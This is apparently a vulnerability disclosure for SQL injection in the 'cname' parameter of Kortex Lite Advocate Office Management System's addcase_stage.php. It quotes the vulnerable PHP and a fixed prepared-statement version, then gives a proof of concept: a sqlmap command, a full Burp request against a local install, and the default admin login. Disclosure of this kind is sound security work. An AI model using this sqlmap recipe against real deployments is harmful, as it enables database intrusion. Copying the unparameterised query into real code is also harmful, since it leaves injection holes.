kortex-addcase_stage-sqli.md

File metadata and controls

90 lines (67 loc) · 2.19 KB

Kortex Lite Advocate Office Manage System

SQL Injection on /control/addcase_stage.php

Vendor Homepage:

https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html

Version:

v1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin

Affected Page:

/control/addcase_stage.php

In this scenario, the value of the user-supplied `cname` POST parameter is concatenated directly into an SQL query without any filtering and without a prepared statement, leaving the application vulnerable to SQL injection.

```php
// control/addcase_stage.php (original lines 38, 39 and 47, as quoted in the advisory)
if(isset($_POST['add'])){
    $cname = $_POST['cname'];   // raw POST value: no validation, escaping or type check
    // ...
    $sql = "INSERT INTO case_stage(name,status) VALUES ('$cname','1')";   // string interpolation builds the query
}
```
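A hardened counterpart to that insert, added here as an example and not the application's own code. It assumes a `$conn` mysqli connection (the page's snippet does not show how the connection is created) and the `case_stage(name, status)` table from the query above; the 100-character length limit is an assumed column size.

```php
<?php
// Added example: safe version of the case-stage insert shown above.
// Assumes $conn is an existing mysqli connection (not shown on the page).

function add_case_stage(mysqli $conn, string $cname): bool
{
    // Basic input validation before touching the database.
    $cname = trim($cname);
    if ($cname === '' || strlen($cname) > 100) {   // 100 is an assumed column limit
        return false;
    }

    // The query text is fixed at prepare time; the user value travels as a
    // bound parameter, so quotes or SQL keywords in $cname cannot change it.
    $stmt = $conn->prepare("INSERT INTO case_stage (name, status) VALUES (?, '1')");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $cname);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

if (isset($_POST['add'])) {
    $cname = $_POST['cname'] ?? '';
    if (!add_case_stage($conn, (string) $cname)) {
        http_response_code(400);
        echo 'Invalid case stage name';
    }
}
```

Enabling `mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT)` makes a failed `prepare()` throw instead of returning `false`, which is usually preferable in production code.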

Proof of Concept:

Payload:

```
sqlmap -r request.txt --current-user --batch --dbms mysql
```

Burp Request (saved as `request.txt` for the sqlmap command above):

```http
POST /kortex_lite/control/addcase_stage.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 227
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH69K8ihjhi62Hye9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/addcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close

------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="cname"

1
------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="add"

------WebKitFormBoundaryH69K8ihjhi62Hye9--
```

Screenshot

(screenshot image not reproduced here)